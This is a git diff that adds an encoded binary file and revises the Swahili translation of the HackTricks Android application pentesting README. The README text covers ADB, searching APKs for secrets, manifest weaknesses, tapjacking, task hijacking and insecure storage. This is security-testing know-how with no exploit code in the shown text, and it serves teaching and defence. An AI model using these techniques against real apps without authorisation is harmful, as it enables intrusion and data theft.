z)pOjk%Usytx~-avH)w@OX|w(y1?!Y4duvDc#5pz;T6A#fXwUKj;7 zIK1i>-mIi2AyZyrcB^1n)%Df4D^(!NV^yc6NYs**T`P6v7wQROfQ<{=$wGq0Sy%&7 z%dyez9yQs79&b0h?kkF-Wv&>zJ*9;cDhIjh^IixN$SFr4=jUWj%G-8Dr|}cS8t_}6 z_YB(190-wuXPfFRp+Hg;UOwP}4UC+)_lTerIbMtVlq^u88+ZARI1Xelu`8@=%WU7l zNP+K-!KVQgXmeETTlpGG;cX6UG)y7R2=Esxbt?#tDBL*rgk`8Q%WK8(5VfObAPCuQ zijjG+x{54FHVV^>Ar>&Nx`L;}mS34_3f0C1Lv}Yi%c~|-;v2~+P~gDY)Id>$rBj2iBg6Q z4woL%`!b4XaZfzh`IgH?gP0N3`7$0@wg@ zD+~2lfF^LJ>j6h)a~vinK?cV=J?7AF6k4ggG&RJvmkOlcIA?r9E0neizAmf84lpBf ziQ`EtL5Qxr)z^QteDje_)A9Y>N*f_(s=IZ+XT{_#Q*yIDt_c=wh2;XEFH_F~Fx2Q}14B`~Wew6d!QkrPT< z_?1F2ZsD)YymWA`%Bw%RfT<{r(9N&BvtB|nJqSsP?eC!F?CCqQr$LU!^A+F6xq`1`0kzVYD9*Xe3hrJ_e?sHLPv(M9?S_A zYV4*x*w2SIE>zMhI5uN;WBH8J+$ybZ&!EQMX=OrNiY~sj8pqIpys3|?#8_BaZbiD* zGQY&JnHviMi?{o@QKYk04UPNg(E@=tUTO~y7#{M81p?An>Zz-bTf5TPgTA5(mV1bN zq9HDoi@|u?EGd^GdAwgRQ)(l?olGMOHB@TqHX^LNygj=3luUrkv_w+NC~mV*zxe~w zs`;2d7Q=J@03u+R5kqd$6Bj}>W>X=YE5}E)Ze5paOXYct1wQd`UK>HRg}In3k%>WT zblt(ih+Vgih?WJtS-5V%j-0>h0SjL*8;F9DOSATjO3{+rjG)f0H(vB)g<>%73zFRk zt^l^p&LyJPY@})wynhiOr5Sbi3D^t?g!I;EV56hvP*A-!D~v@GnR>Cnk!S>Di`BrT z(pJcfn5jUiflNiPrm`~_j=~us--%a$v(MsHG1|sq8BDQ_p{DsFYNLkAub6?M$lZ4- zd72Rgx92D3qabY*hz-_{m@EY-uGU)eA)nh3`+}0(4UUE#l9?6&_#6l9L~U&fj$Y&V zlr*iy#b`abmXWI?YsGiN1YVYDb^idc^I!vaf#Cl5nakHM!dRZesaH$di5jN{+-Fr$ zX9G>LtdzIMU3sAmVYNyvcx>mN5DE`#1~wVb{>y^eg!IA9bK*Ia4P~K6*kYR&FCA%3 z8OYSN%cT-iAj0j}m=SUsLM&^k!BJG?Dx7(R^RZS^@y)Nqv_{atD^-0(UYk;aaZ8&% zVh#Yn3V9P<@yxx!j0FxWQ0Z1>gJsqAxsVAilrL6({{XyMOGQ=mMchWb0G9c`m>La& z`~wxQBoHdFphnd=@o>0S5E?iOwXEI6E23#()054>#*(ZY`$`C!Ahg#!#AT>2d-fq? z!Qf|t0BJ&m<^nmu4~S({@beaquq&bSF`e>N#5BvTbhN7Wg&qinSNE78T>uukk5EAk zFa5!&5|G;zU7HXgh%;<3N+?|`m{b!*T6@O#V-Of68?@(?T?=3q{hrWjlFLriYuX){ z6b4Ul*a@M*qPHzL>p&md;xTm~9>txy_leaILJTNq`G8qumkd`Fm|#Z$z__fld*Q2$ z_lZT-6|1y$)J+!Jqhjf!EJb94FD6%w73R)m4i}RRmq+r#lF?Uw3|pLU6>zLd-E<1K z%??vM#$D)XZ_BftaKVy|+*oKSId{|=K!S)C*C}=0E*)JWZ0y2vglwKJ!dZ*PPW);y ztgr){3x`Gj0J(Ap62iC!n-ds#f+q&D%nUFyA|xs-~l@S~fQ zfl(1wjakkKMOG>7IOkC@jYf*kEDS0l(kiQLbCU2ai~j)FVptfSU7f=~7_4lnWeh7! zy2Qyea6GP7q&02UW7Ua=$q+YL4ODnwcggb%wwg{NSggD1AzC8XS|>ds7o10la?aW5 z6Cei<=3)VR(1oI$pTtlqusdY{s2DXgB`Z266^icn%tKCf)LMc8ismDjN6brZRkwlz zp!ca}h~TE8#t^V3iXL0$C2J_kn%~57g)sL6P!?hd6^l#3F1n1Z{{Xm{;4&#pMHpRI z?;Fa2^MuhnHY-3nUM^vTQQPlIOYmExM;90{6H)TRu^7n zx}A-lGqUx}Kga+Q(zeI?hoLr;YB*lRuC-q4PI|l$Gtj;-=!w**HfMRjUA$HM%-9pq zcTEOzZl$v8FsW)Blp*dDcc8ZQ*;Js?FG&ayDy+g5wwfvK7(ZR=oU%2XXvM=YPcdZ{ z{kH!A!d#^QqSey2XUs2h0I}Ph5eX~3!|=I5uq;F zIvqEBUZPzKoC(7GL}`n*3-d6bQW+C=KQP6Iq<2`m+yFamD_6{XIK-!%ZZ&qbg%9!` zWwVmKQRIX)C|57r8T_0~wNk{GyQ@3roG?O~><5lF+%=UHZF+o%kM{>1JMzp+*IZl- zYQ@mI@wz2QTF(XxTZp17F@tS+T`>LtE01{W%B>pn2y@c!HkJ`WP_4gm;##ZvFqMTa z*1^FPTOP+l`#{4qS~bj~F63hW02zQKhmQgA61?sfJ&vKehAo07t^hpvj{u7(wV6$r zv1nZw(Gr&&mqZESISYQ#TxBwf{_!qBVSQ)*Lub%dF;6fw=h%*)jPna#4N3!w>K6v* zLtw8Uz#gv$Cuf0h)A1Ive#R>-n1(A`Sr}3s z*FHSM)tY5agMjrjhD#FGG9E21^TYxL5Z#Ogl|?)JG=^dmb?oU!g{Rx`SWAc8mbI!N)m^K`8YcgZs*EnwG_*Ym*GBo7d!x za}u-IRrrRrZS&8YlBDixsTF?}MX zO*}&xW#7>1C`t&G=3Gz$gJ$C6Agb9>&|I{0(20SMT6%+LZz`xHtqycdAUb95`{d*H5+qUkD(E$M}SM*Ia*sQlq0HBElLDz$&xbi%#{eCum=-q zU;`AznL@{Fl*!auK1G>gvN8UV6@$oT;2*=Pn68ux$*IBQy=Dq_uIx1jfCn+w`cv2Z zl%cxL8P{!IKQR*D>BH2#n%!ouGtV-*rFu_=V~*uORGd{@6iO%(Z#-9z;$V~uu)yQQqqzd# zcP&)_?eI8wy-f=gRD-`X!QI$xEtIY2-ui&0ertg8Cl|zivOT9PQ8E2sp}edB-}@aw z3{(pyss1^+QPfkF!zCTw$KF>WW10KAA~21dF7y8Y7z)S@SsmiM##5lt$1Y_BOc2Vv z###o9uI509vbgrkjV2W9<1(^@-E8yq3g|9X=8t$ly9Hwv01#oizxPCJG*&h8{YJ%r zoZt^JRav33Sf#6xrXUpEH7*z%0RW>0_b!AtM=WHdMXT55T6<1JYjfN&6-GRZ)Jb%+ zz9%S5LvH~yaOp}?ztqpfT+v%|9>bP*cfV1N~!|m%k%q1a?@T*ne$)> z{6ZHoHa=y*qQukV7g5lIN)B+{I+eQ{$yC2EcgI)A!bjvogw3(4j^af^rnr_c08w1Q z`6xGf#0rNM<>mn#9gc6zRoP@r1X((6O_HpR0?0kb?v_Lk^Bjg6x?L|0qchR9uw8vX zn9)kWD{*i*8BkrGaCI&%p!1dc?ru_AE}-Hv*F)}?6boM>J;zekBL*-?Sf^>M4-U5)%ll6tDAp$WY?QSlBWO=;H(wX6HMWB zt2}!^z)*Pq0B9J&*ZU>t@E`U>x1@tgQW%=KVXQ}hU<$c;exOo8p=tShfN0B`xkN4- zb4Xkk54kq)3P4pD=P(pv7m(L@{K^6y)UMSKGQ|MkSU?X&-MnLn(1hq(@+;me78Qob zMTtV0tm-IG$VF|f)Kq}rsx4bq+4lr53eOAxD16uL5ou!!U;7*Zz?Wn^;v50{h*Wco zGRIeDXn|N>NF~AV4aMY~G;uAsQ?s~jIlIO_JujhX8)1zVdaNu?$yMsp4~ z1mTwjxNJF;eTL&0gjfa6gQ8Q5mhzTxsH18I)fA{8d~Ms|F5m(^auEkLkcztFG09Tt zt_@616kBcP2?YdlGD0ZrBmm4j?X)qlRx+%cDx zTZBp#87*hpFdzk*X&BKZ2at48eb zxMu#wzkE=DI|g6?9E8c4O2e{Yx8cD!1Gizi26J1AbP5W}PyMwH`5* zOl9)~`Ev!+S9Uj|FjaxER)7K93u?97FoY&GLkQPu+XP60(l=c(q!_Epmq&)=Av&%y zJ@Zn)(Ngg@&F7LN*f#sjA>?=^fG>ef%asomaZhPiC%k+soj+3BgIK&l>|__h(}?C# zd`m5ZnX2&dcm`d8=mFVYsDIhPA{~(v;RxTH?J9E+AxR9p^CC(u$z%;$E7G^jkmDd1b>(F}kY1 z_W}Lb8oXhI)nBJi%atLs5cZvPLCGm0?yr z!nKskYq4Kk&m<6vTzrXf+JLFgV;#Y2g|tbk069(#qkfSx#7R6vlDF>WHDR>UR0q`( z3ClMSDkv|1a;OD>FC}pbKF|LEXoc&W#qR}M$ooTL4mEOu;VROS`o#%Lv~KTlrU5fg z`XY;6z~BTZPCJGpRw%-(x;y^>vtjRe9$({_`Sm7bd6c$% zU68;~IK{XJv{~FE<8WSddEiNr9c6tksrQd&!HG{hQ5;J8LX1X^BOIccP%;@lVwH{~ zTfD#(-GZQKTPlbYeFM$SZrQmw_VyuL9;lPn6)s}py$0x5OiP>c5eZZ8gAuqrU7#9Tu9(U$Aiac8-m=~UPL!;KJ_oanzTdK6&ea^ zqyA72nG~qfhcywGdO0I9yAJaV7=cxPKG2SenZx75&(vDJLg?k=-!|vPO2+VAE)R}= zCHJje@R)w`+J)EpCK3mI+Zwy@@5IKViwLv`9tdIp_KAfTL{zp%!3OIdVK59ums2(Y zb(puo7c5H*qQtI_2Rf>(ljw+W&1?LJEm9f z;NoKteCi6o+?kf+CzNM!LfN41;>1zB^DE603^C>n!)2Rp{o!>MWU|ZCQC>c0uaEZy zgCHN2wJ{3K9zr@0=FPt|Y>jU3^Ty(`|oSh;HB(`TCT$uvXUlLVHXs zVa2cjIW4SgvX(5LX!4?5u?VMvs?h+YNKek?E(xKx%&{59#x3tGH?y}-yKpa3mb@$N z4rH>cs)Q^QLch#qp38XmggDq`e{kS%Fx^AhNsy(#6NnlprTx9&6$S)T@yscNyALl+ z9Xc6GaCwO6WBN+>xC-zBsywjyVX$+3{{S!%RLwP2@drw_;D+I54o#ny;+C}(G+tkV z*@&t60BDf9X=VmVsjEBK5;O!5|ckW4DM$`mfQ3#r8-S_4k3-^sYGRgiz&KuQbc zM+CoRQT9LLDsQ|vE0Os=Ils7;>){`th4MpIKmcGkF~nrGqb1;FV6Fvo*inc40}X;UR(ZibAI^h6{~*yz%EG}?3&g>VMr7cOL-Qz1f!U{j7pf< zQG5kir_3jyGQ4I2w02u<&1x@g6r0a;11wyi55%0I=77srl=V6OtCo@^*g^1h*lgzw#pd8vg)Eb;oV19DJ83^zIdUvDo9< z96}Y2&y7Cmf^dZb4iTT07m2G5WHKw0DvSUyJQA{^^;h)>N?Nr_D3Fjc zy~=>1xwqzIX;XpM)CYFOmDB^qxzrMt7u{w>Ye82O1%j}p5QTg;;L1QxDoRD6&fx`G z?-I(b5~enS=^LGlW@OjmC85dYT3Pv-I2}2a*j5EQYA;RqRKpgEM#uP)(c!QIBW|4g+Y#uTaZ=@Wte@kobiS?1EmP&cK({NJ?&9dCkIxuO;DY zbVR(Eryq?<^n6aC><(R9WH!KF3;BCi$QuYymuLN8LwOswn(}!r4`Gum& zI6awO%rkDdmg5=#KkbxJmnwg_+Oaxs;uWOvd8i$P=I@T8sFYAA2?g2!)K`ld_LaF6 zRZ#NY;Mx7j~gXb%noojN8R)IFUcx4Z?9ExU@Ls+?-0@HVLl%{o3 zwTdjgK#moPy12nXD(t5a7QztNXyl_18D$^sFGj4#g#`+(&_ApqO`VvJ>xq1NsQ_6h z+lVAQM%WUY1t~-Y`KBiqAU&NZh3y;oQMY49nz>O)Qj7lp)jiulwcNNxHU_>&{Y1jm z$@w??lCv`omXN7QEKT^d)@v~AOlWXdNB5mIRytw|S7sJ`F-Rjv2kIhx9o^TrQ>r`+ z3jt_w^-&dDT~N7txL{a(n6?0-+t~y1rEP5^DEC~j>5AGxUI+*5~U3*s)a;V z*H>9(BCR=03|o1{%LQ)Fa7Xrw1E9&s9qf!bJP$d?^ArdgShK3X#Cv6n7B}Wv^Ogn{ z4mc6o)T`tueRKWHKtm|w+VkQ(Qh=5h7s%E~_u>Uzhbx%&*uc-Zv*H0D&TM>t2kr$V zi=bP2Zt;dD4h3g&q7uE9xp0wo769UelsnUbiIY&`o%}=!0hY*MW8FkL+n9wY?1d_p zH!#rJIgLB0*cc;jM|xIVs>90%as?C{z1(OnhO?+-O|y(aD7h-594n_XzuP|qVe+?n(BCXo{Qs=fBSKI;gF^6O@e=kSz0Pq$zuPfz*HvEKg8|;Jud_h#Y z^A~J=)k`(+pU!(Dl!jshVh~+Z#6}diyu`X7aIQQE^%Yk<=28e9i(@U{dV*rnCy2|m zI!q7)KHDs=0Ob9|Dm?XmHVt{v&TTP}2xis*J0v z=4fK2RUXK9y2$q)-rrs+u(x28UP{B8{0Fm#M3|9uqY{K3G5OrJaoZ7=5Kv2~AP{%b z#{z}`!`@XRLdjBVrNS@j;)3qj1*uLJHk|(e$N}8MVf70#Wngnh?+LWEt1e+|MipO= zF`-LpMb|}f9@Pw?Fj;UBp;%95*^;&nd%*tyxN|}jv&k!QxT6ghYw;gKNP+>XgERup ztldQV7P`_|FD12LCz$b>NMC2O^9Hdv>>NIP%lR}YGEL^As+@R&38?*`C7mtss`{v7 zb^!tB`J2xhOQNRe({AU=N}@K7JdqH<;YJ7*IRwmAcc+K~AZYOtCJ$>fjeJ6-rkCDl zG!s4$u%v5ogKx}OCOzkrBBnO*%JR^=COwO-vrF%Qg70YAR!Mq_)+)jeP^b_G*3e)e%Z6UXK}(>oI=PNX!*ZyH zVBS-hM3?0KAfDo6U&PLY$69!a!l(wp=7MJ-;vLKBG%v@P#6X)dj56dqf80e=Qd4zM zp&M%fqwrK~_>`g>JTaS&ldljS(^#l{#E`Qyvoylo1Q%*|-MvB+n1}S`f%KTS%v~3e zBC<4vFPJ8cqm}4#vEufNj*Hzn^N&JE;964s64^`oGZVn~S^8OK1gge;_V}aT7HX|O zc&+0+pNPbuILsoi$?gwoKM(?&yR5*g0Q?hy*Ye}xDk`?QlCT_dY9_^w-O9S&`M7|> zbyC_SQN=Cb+`fqL<{i=&!fG-{c$v=ArSaxbxOL1I04tJTtx5zPfuQ!NvJrM_V;g)C z(rIZj?GQjs66KsFnoi?#yDm`K?q3W+V^~7nCgxm-)?OnOVgx>E1;^}9c>e%+&Q-9` z`Fnit5qhV6O6eyJO`i1UI$>mFYlz_j)@d-QVr6@M-dr`YZ-pls`KjaPdOK?E@8m_Rz1LDL7?%vft4A|cwh zb6r}?R@Ql93W8gQ4mg%T4cME6FDU%hpmzASmG=myX>?|ucQdvHrdTA% zU2!djuB$TsRW(F9M7MBN>X&s@09MG96Jm#mLdfGc5GxV*m6~ehAv44rnH$RSD6u_D zY;L=mg%{0P9W({r$d=YHlT-4T&GiUx6%evq%WgeDir+UY2I$6d5a%9aklVzifUEk1 zaXXeuHe5ushM-dpSuFnUH;Ggh1K-?WxV^%8h>5gb2%$uh={l7*Z2}jV0^x8uK6eDM zPTfbSz6x5#wRQ&4$rnm8j0ccz5A|_T909ybi&Iv{bN>J*ggvZR_TVrZP%KO;OrOG7 zc1knD<|`!Hdr7@wr`cZcts<*@%7c@$&_Uxl(9U8zU`VeTjZ$RpQIE4KV41@Z9uPT> zeUIIbj3XKmKsbNb?sW;U9|=xTjU3G4TRfi-9w>KaE-vP)!GFvUtnVtG(G5*!FxhO2 zdhrTpBem`jDaIj!%pe*}zr2gRN(W70X)-)qTHJLr*-`jTW(S^^xG2-^Uh0827}zi( z!W=0_+-~u#W&?__@xk6=gf8M?9WGNV+|&|?8*6Kp+zs3XEj$k}NwNnKO4HmY964;B z^01@fWx$#m2lE@yj}5?L23D>X%eCAr8hgsz@d`_WO*Jaro$3Wu*KtCM8m(MZb?-0m1;l%U znn9_|?y-x2+h-uvO{!bB7u~^AELiRp6;ObBdaxtlkw}C);mTO&AUHd?T7#3fGQ_H&0^55JS zluj1juX_B)A&Ze*6EITYxXNl6+px#`<^u`DMO42yS$Ph9qWl#$E8p51W1w?zK~;(@ z5baoUUgp`ifqIP!wSjOMq06WZ3nJ|WEbQX73O8FJnUe||H!_IMSBjQ8*Y7RN_K0+F zeb>_&O2cJfhw?Y~2&yfO;tC3fD~Oe4$5Q?Fwlb@XEYNZzhA?`9*R;4x4B#<11ZoR| zs(_XFK2n_!jLZEHNFb;^tVWJyN)n#s(pd3=C1TP5D~Kp8&4xZ=Lrr1n7R8oFEp$Ut zp)*RvA%k@8R*Nt;%Cq~{Sw(BicNSr$TVX9nY{BwCwGgAM`485 z!d{u9`%4kT4U-+fC?=If6F;(eo`ELC`dbq|tijERv?|SdTcU9|{OC!v}zf$R3!w zc2bBiAwuR=j=;-^`NnNbIJXEPTw$ZC7)Wn17Nu2qf%7KqCa)7ntBw|{E8GU5OUuFH zB?i_}zlH`pT{=cKxLN_e!7xfPQ)p$3rSN7iHoO&>1g}KFU?}-Hm!c^4AQ8cs+jlI- zZKUo2r0$MlX-%^c5t8#Tfzg>$xa%lFgI-y~nr>FSz976VqH|g97%lPD6LBxjld-;YU8O@8##wGO$5t>+7YIcmQbu03K|SWG&8?wpN!-+ zJ%mAJ4YO7~9YL1CtZT#}Ob(zGYE;JRRALv=08(l{zS|+O2aUjiki@#nU9AKrm?pWE zx^r9jgy~}a;pSLu_fpb=8*on!GcE=Q@ep!@qGSa*%(R3Y;u}<~HjAQ#JcxkNL-8qV zv;{x3D)`)0#!oW(nM3fy$g9K}M7n-RV!_)IjS^DSY~bclCI<5nPK>uMM-CydDh?p( zEj-=C_zVmdTIoYwY2xP15v=YQ6*dfz#Dm*4GL-tR+Ho-gpu#ZSx7=Wb0=in4VOqY) zP%LsMF`Op$zxD$xnC1^`u;&%=g@W~MHyoc9U(pzIz9?sUI=&^bjl*LEX_EpGd2L1N zNGCc7muHntQ)ZYSu4W~ofSv4=7i$)5Tfg9U7DaR+vanmb3x#KlObPDFc&+rzi;+{z zlp%99Wbue5t%po(*=pbkdst3vLd7Sv@8is9(J{)_p=-mCmWl~kYBSH!=_$bSjy@p4<$0JzSf=>%1gR0mOC`c0 zx-fi0-*8Ha^JL7pbM!;0Sk@&_G@_F%4zM|M73|5&DUv1O#I&Pj%Pn{#!X!YgL0ql^ zr7(M%PSP`TFR*5|V+0hK4z@Ql@lN5WHPV?_qI} zrsWZ#e=*scvx$J9Z#>Ga!tyrEqz*A2p&rn7+o%C-z+L=B75$}-DsVFDVKjM`A>)Wb z7QC|%(UvQ*)KMvO)=1>LVoIuaT8PLTy+CIa_X9X`M}N3In_#ee1T{1!Z&p-t^zl(m zj#CU(XavKtD+bBNVWK#Qqa{oJ)HUW|Tsy7N1#PlQa(zP{WHh!guV}A`3w3Z;SbBMh zwT*`@Za9$5#VAHopnS@?jq%K_cbtp>C7b~i@i+j3Zdia1icrmBy`U~H zVRr1r|y%A&SWo0N&n5J+JN=WYU0H}Xe!p(#3mF2JvNVyVt0 zXa$?BL^ulPk*kUI8oUrb4!<(fxWQc=5kl(KOEtmOk)+DA0VuwR>Ht7ph9Qx(v<=)Z z5k#&=xQ0cz(+yO~WeQ__kj{++DWQDu`w(+E02yhM!y1a4;t;KF^BWnj5MZ~{zat%2 zL~S^`3-=QcS$2liV|WBR0N~gFIgIY|Yj8wl8jb{ZjJcKJxNJ}~p;#5pR87#l%NIxD z7`Pv_NTcLcz#s%=`h(R=dqzRMR8EG#;Q^s60uo?-1vy-fQCFJ9Y5@`IZPEqL4|HG>u*qs6819#j%DB_=HTcq zqtqwf9YIu%1x%sQ zdY8mkmNFt?f^h{|1prk{4X50~E{xhKxpGR5A{;KMkVFpRriG&8)n+nx3~*w*f(AnV zB?fWYV*!*y3RiG;P!p0^xLiAXjs(M6m93iWf>|;_yj)9l9Bouw+-DU`&D%XdT(twD znQOGvY$<_=bGT#%rGmz;R#GrfRQHr@5P%SXtQN}qV)%oz5ko1wtC{W1!4N~tXaJf;NkIFhgKEnRGc4&t6{J|i zswla}AX+7{1Qzp0;vs6BRY%Q-jnv0i9;FZN@fXR2DOFdunQ#C`wHpx`b(mUC(xBq% z;N_9j8?TZvI}kAn6^^P1S`v$Ih=CZG880T{s3$v@*Bvn&5M0Fm&vMI`I3oExlK5oQ zAy%-{)j;t$2IcLU!BJqa!!iQ}OP;$d7zBQ0m~G1uS)PU)10Bc3+sqy~I)#wL3qjHW zYmYIY+6#Tf=CZSmUg4V@B;;{(K{6<^5Wl)sEEyu&A<<>xG#?QIP6#NAQ44CiBgl`K z07Dv;gdZ?`eN!O)u#}~aokD>n=D3blAe8h=XWEc>~qZ~vQ3n~W$xWke%%A}ZR z!~-O>$*kM~RQyfO7&%-zlmN!AX(!A;QJ2gk+Ta?hj;gFT)O0!{!K(L_r~~1Y8l#3u z)j&YIr~{g)R7Vo01S!c8UEEWOmuuw^7$Xadi9%GRmor;sfpGYU3a^+U+z>ZG$EGUM LqVD5Nw}k)M7RZv@ literal 0 HcmV?d00001 diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index 6ad4dc6f8..46313f60d 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -2,7 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -## Misingi ya Programu za Android +## Msingi wa Programu za Android Inapendekezwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **sehemu muhimu zaidi zinazohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**: @@ -12,8 +12,8 @@ android-applications-basics.md ## ADB (Android Debug Bridge) -Hii ni zana kuu unayohitaji kuungana na kifaa cha android (kilichotengenezwa au halisi).\ -**ADB** inaruhusu kudhibiti vifaa ama kupitia **USB** au **Network** kutoka kwa kompyuta. Hii utility inaruhusu **kuhamasisha** faili katika mwelekeo wote, **kusakinisha** na **kuondoa** programu, **kutekeleza** amri za shell, **kufanya nakala** ya data, **kusoma** logi, kati ya kazi nyingine. +Hii ni zana kuu unayohitaji kuungana na kifaa cha android (kilichosimuliwa au halisi).\ +**ADB** inaruhusu kudhibiti vifaa ama kupitia **USB** au **Mtandao** kutoka kwa kompyuta. Hii huduma inaruhusu **kuhamasisha** faili katika mwelekeo wote, **kusakinisha** na **kuondoa** programu, **kutekeleza** amri za shell, **kufanya nakala** ya data, **kusoma** kumbukumbu, kati ya kazi nyingine. Angalia orodha ifuatayo ya [**ADB Commands**](adb-commands.md) kujifunza jinsi ya kutumia adb. @@ -53,7 +53,7 @@ Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers mbalimbali zinazopatik ### Looking for interesting Info -Kwa kuangalia tu **nyuzi** za APK unaweza kutafuta **nywila**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** funguo, **sifuri**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa utekelezaji wa msimbo **backdoors** au backdoors za uthibitishaji (akili za admin zilizowekwa ndani ya programu). +Kwa kuangalia tu **nyuzi** za APK unaweza kutafuta **nywila**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa utekelezaji wa msimbo **backdoors** au backdoors za uthibitishaji (credentials za admin zilizowekwa kwa nguvu kwenye programu). **Firebase** @@ -65,19 +65,19 @@ Lipa kipaumbele maalum kwa **firebase URLs** na angalia kama imewekwa vibaya. [T **Udhaifu** ulioainishwa kutoka kwa **Manifest.xml** ni pamoja na: -- **Programu zinazoweza kudhibitiwa**: Programu zilizowekwa kama zinazoweza kudhibitiwa (`debuggable="true"`) katika faili ya _Manifest.xml_ zinatoa hatari kwani zinaruhusu muunganisho ambao unaweza kusababisha unyakuzi. Kwa ufahamu zaidi kuhusu jinsi ya kuikandamiza programu zinazoweza kudhibitiwa, rejelea mafunzo kuhusu kutafuta na kuikandamiza programu zinazoweza kudhibitiwa kwenye kifaa. -- **Mipangilio ya Nakala**: Sifa ya `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulika na taarifa nyeti ili kuzuia nakala zisizoidhinishwa kupitia adb, hasa wakati ufuatiliaji wa usb umewezeshwa. -- **Usalama wa Mtandao**: Mipangilio ya usalama wa mtandao ya kawaida (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama vile pini za cheti na mipangilio ya trafiki ya HTTP. Mfano ni kuruhusu trafiki ya HTTP kwa maeneo maalum. -- **Shughuli na Huduma zilizotolewa**: Kutambua shughuli na huduma zilizotolewa katika manifest kunaweza kuonyesha vipengele ambavyo vinaweza kutumika vibaya. Uchambuzi zaidi wakati wa upimaji wa dinamik unaweza kufichua jinsi ya kuikandamiza vipengele hivi. +- **Programu za Debuggable**: Programu zilizowekwa kama debuggable (`debuggable="true"`) katika faili la _Manifest.xml_ zinatoa hatari kwani zinaruhusu muunganisho ambao unaweza kusababisha unyakuzi. Kwa ufahamu zaidi kuhusu jinsi ya kuikandamiza programu za debuggable, rejelea mafunzo kuhusu kutafuta na kuikandamiza programu za debuggable kwenye kifaa. +- **Mipangilio ya Backup**: Sifa ya `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulika na taarifa nyeti ili kuzuia nakala zisizoidhinishwa za data kupitia adb, hasa wakati ufuatiliaji wa usb umewezeshwa. +- **Usalama wa Mtandao**: Mipangilio ya usalama wa mtandao ya kawaida (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama vile pin za cheti na mipangilio ya trafiki ya HTTP. Mfano ni kuruhusu trafiki ya HTTP kwa maeneo maalum. +- **Shughuli na Huduma Zilizotolewa**: Kutambua shughuli na huduma zilizotolewa katika manifest kunaweza kuonyesha vipengele ambavyo vinaweza kutumika vibaya. Uchambuzi zaidi wakati wa upimaji wa dynamic unaweza kufichua jinsi ya kuikandamiza vipengele hivi. - **Watoa Maudhui na Watoa Faili**: Watoa maudhui walio wazi wanaweza kuruhusu ufikiaji usioidhinishwa au mabadiliko ya data. Mipangilio ya Watoa Faili pia inapaswa kuchunguzwa kwa makini. - **Vipokezi vya Matangazo na Mipango ya URL**: Vipengele hivi vinaweza kutumika kwa unyakuzi, huku kukiwa na umakini maalum kuhusu jinsi mipango ya URL inavyoshughulikiwa kwa udhaifu wa ingizo. -- **Toleo la SDK**: Sifa za `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikionyesha umuhimu wa kutosupport toleo la zamani la Android lenye udhaifu kwa sababu za usalama. +- **Toleo la SDK**: Sifa za `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikionyesha umuhimu wa kutosupport toleo la Android lililozeeka na lenye udhaifu kwa sababu za usalama. -Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama funguo za API, mipango ya kawaida, na maelezo mengine ya waendelezaji yanaweza kugundulika, yakisisitiza hitaji la ukaguzi wa makini wa rasilimali hizi. +Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama vile funguo za API, mipango ya kawaida, na maelezo mengine ya waendelezaji yanaweza kugundulika, yakisisitiza hitaji la ukaguzi wa makini wa rasilimali hizi. ### Tapjacking -**Tapjacking** ni shambulio ambapo **programu** **mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoificha wazi programu ya mwathirika, kiolesura chake cha mtumiaji kimeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati ikipitia mwingiliano huo kwa programu ya mwathirika.\ +**Tapjacking** ni shambulio ambapo **programu** **mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoificha wazi programu ya mwathirika, interface yake ya mtumiaji imeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano huo kwa programu ya mwathirika.\ Kwa kweli, inamfanya mtumiaji **kutojua kuwa anafanya vitendo kwenye programu ya mwathirika**. Pata taarifa zaidi katika: @@ -88,7 +88,7 @@ tapjacking.md ### Task Hijacking -**Shughuli** yenye **`launchMode`** iliyowekwa kuwa **`singleTask` bila `taskAffinity`** iliyofafanuliwa inakabiliwa na hatari ya Hijacking ya kazi. Hii inamaanisha kuwa, **programu** inaweza kusakinishwa na ikiwa itazinduliwa kabla ya programu halisi inaweza **kuhijack kazi ya programu halisi** (hivyo mtumiaji atakuwa akifanya kazi na **programu mbaya akidhani anatumia halisi**). +**Shughuli** yenye **`launchMode`** iliyowekwa kuwa **`singleTask` bila `taskAffinity`** iliyofafanuliwa inakabiliwa na hatari ya task Hijacking. Hii inamaanisha kuwa, **programu** inaweza kusakinishwa na ikiwa itazinduliwa kabla ya programu halisi inaweza **kuhijack kazi ya programu halisi** (hivyo mtumiaji atakuwa akifanya kazi na **programu mbaya akidhani anatumia halisi**). Taarifa zaidi katika: @@ -100,28 +100,28 @@ android-task-hijacking.md **Hifadhi ya Ndani** -Katika Android, faili **zilizohifadhiwa** katika **hifadhi ya ndani** zimeundwa kuwa **zinapatikana** pekee na **programu** iliyozitengeneza. Hatua hii ya usalama inatekelezwa na mfumo wa uendeshaji wa Android na kwa ujumla inatosha kwa mahitaji ya usalama ya programu nyingi. Hata hivyo, waendelezaji wakati mwingine hutumia njia kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` ili **kuruhusu** faili kushirikiwa kati ya programu tofauti. Hata hivyo, njia hizi **hazizuizi ufikiaji** wa faili hizi na programu nyingine, ikiwa ni pamoja na zile 